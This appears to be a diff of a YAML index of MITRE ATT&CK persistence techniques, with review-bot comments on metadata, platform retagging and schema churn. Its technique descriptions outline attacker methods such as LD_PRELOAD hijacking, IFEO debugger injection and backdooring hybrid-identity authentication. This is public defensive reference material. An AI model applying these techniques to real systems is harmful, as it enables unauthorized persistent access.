+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.011:
technique:
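Review bot: the newly added T1098.007 entry ends at `atomic_tests: []` with no `identifier:` line, while T1505.005 (`identifier: T1505.005`) and T1176 (`identifier: T1176`) in this same patch have one, and the rewritten T1137.005 also lacks it. If the key is optional for whatever reads this index, document that; otherwise the generator should emit it for every technique, new ones included. Also in this hunk T1137.005 changes its platform from `Office 365` to `Office Suite` and loses `x_mitre_permissions_required`, so any platform filter keyed on the old string needs updating. The `PRPR_RULE_MSG_NAME` in its detection text is upstream ATT&CK wording (it appears unchanged on the removed `-` lines too), so leave it for an upstream fix rather than patching it here.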
@@ -29823,7 +30257,7 @@ persistence:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -29878,13 +30312,11 @@ persistence:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -29945,9 +30377,9 @@ persistence:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -29956,7 +30388,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -30009,7 +30440,7 @@ persistence:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -30030,12 +30461,11 @@ persistence:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -30119,11 +30549,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -30136,7 +30565,6 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -30149,7 +30577,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -30179,7 +30606,8 @@ persistence:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1525:
@@ -30211,7 +30639,7 @@ persistence:
url: https://github.com/RhinoSecurityLabs/ccat
description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
Retrieved September 12, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:27:49.094Z'
name: Implant Internal Image
description: |-
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -30233,8 +30661,6 @@ persistence:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.005:
technique:
@@ -30260,7 +30686,7 @@ persistence:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -30286,36 +30712,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
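Review bot: the removals `- spec_version: '2.1'` / `- x_mitre_attack_spec_version: 2.1.0` leave T1547.005 with no attack-spec version at all, whereas the T1556.007 entry that follows has `x_mitre_attack_spec_version: 3.2.0` re-added in its next hunk. The entries that lose the field entirely are exactly the ones whose `modified` date regressed, which points at an older source object being matched rather than a deliberate schema change; worth verifying. The Azure AD to Entra ID wording change in the description is fine, and the citation keys (`Citation: Azure AD Hybrid Identity` and so on) correctly keep their original names since they are lookup identifiers, not display text.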
@@ -30323,9 +30747,9 @@ persistence:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -30334,21 +30758,22 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
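Review bot: the platform list for T1556.007 drops `Azure AD`, `Google Workspace` and `Office 365` and adds `Office Suite` and `Identity Provider`, with the version bump to `'1.1'`. If any downstream index or filter is keyed on platform names, it needs regenerating in the same change, otherwise a technique now tagged only `Office Suite`/`Identity Provider` silently disappears from the old platform views and never appears in a new one. The rest of the hunk is key reordering (`x_mitre_attack_spec_version`, `x_mitre_deprecated`, `x_mitre_domains`, `x_mitre_modified_by_ref` moved above `x_mitre_platforms`), which is diff noise but harmless.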
@@ -30388,13 +30813,10 @@ persistence:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -30471,12 +30893,11 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30495,6 +30916,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -30502,7 +30924,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -30522,29 +30943,31 @@ persistence:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1505.003:
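Review bot: no objection to this hunk; noting it as the contrast case for the timestamp concern raised above. Here `modified` moves forward to `2024-09-12T15:25:57.059Z`, the CreateProcess and WinExec references gain matching `Retrieved September 12, 2024` dates and `learn.microsoft.com` URLs, `revoked: false` is added and the spec version rises from `3.1.0` to `3.2.0`, all consistent with a genuine upstream refresh. The reordering of `Microsoft Environment Property` and `Microsoft WinExec` within `external_references` is content-neutral.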
@@ -30621,12 +31044,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.003
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30641,6 +31063,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -30649,18 +31072,18 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
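Review bot: `+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5` is inserted here while the very next hunk deletes the identical line lower in the same entry, and the same shuffle happens with `x_mitre_attack_spec_version: 3.2.0` one hunk up. Consider having the generator emit keys in a stable (for example sorted) order so that future regenerations only show real content changes; as it stands the actual change in this hunk, the T1078.001 platform retag from `Azure AD`/`Office 365`/`Google Workspace` to `Office Suite`/`Identity Provider` with the `'1.3'` to `'1.4'` version bump, is buried in churn.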
@@ -30692,9 +31115,6 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -30766,7 +31186,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -30793,7 +31212,7 @@ persistence:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -30819,13 +31238,11 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -30946,7 +31363,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1136.001:
@@ -31018,7 +31434,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.001
atomic_tests: []
T1547.004:
@@ -31088,7 +31503,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -31198,7 +31612,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -31252,7 +31665,7 @@ persistence:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -31285,8 +31698,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1574.005:
@@ -31317,7 +31728,7 @@ persistence:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -31352,12 +31763,10 @@ persistence:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -31434,7 +31843,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1136.002:
@@ -31488,7 +31896,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.002
atomic_tests: []
T1542.002:
@@ -31520,7 +31927,7 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31550,55 +31957,10 @@ persistence:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.001:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
- type: attack-pattern
- created: '2019-11-07T20:29:17.788Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.001
- url: https://attack.mitre.org/techniques/T1137/001
- - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
- description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
- Retrieved July 3, 2017.
- source_name: Microsoft Change Normal Template
- - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
- description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
- Retrieved July 3, 2017.
- source_name: MSDN VBA in Office
- - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
- description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
- Retrieved July 3, 2017.
- source_name: enigma0x3 normal.dotm
- - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
- description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
- Retrieved July 3, 2017.
- source_name: Hexacorn Office Template Macros
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- - source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
- description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
- Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:01:35.918Z'
name: 'Office Application Startup: Office Template Macros.'
description: "Adversaries may abuse Microsoft Office templates to obtain persistence
on a compromised system. Microsoft Office contains templates that are part
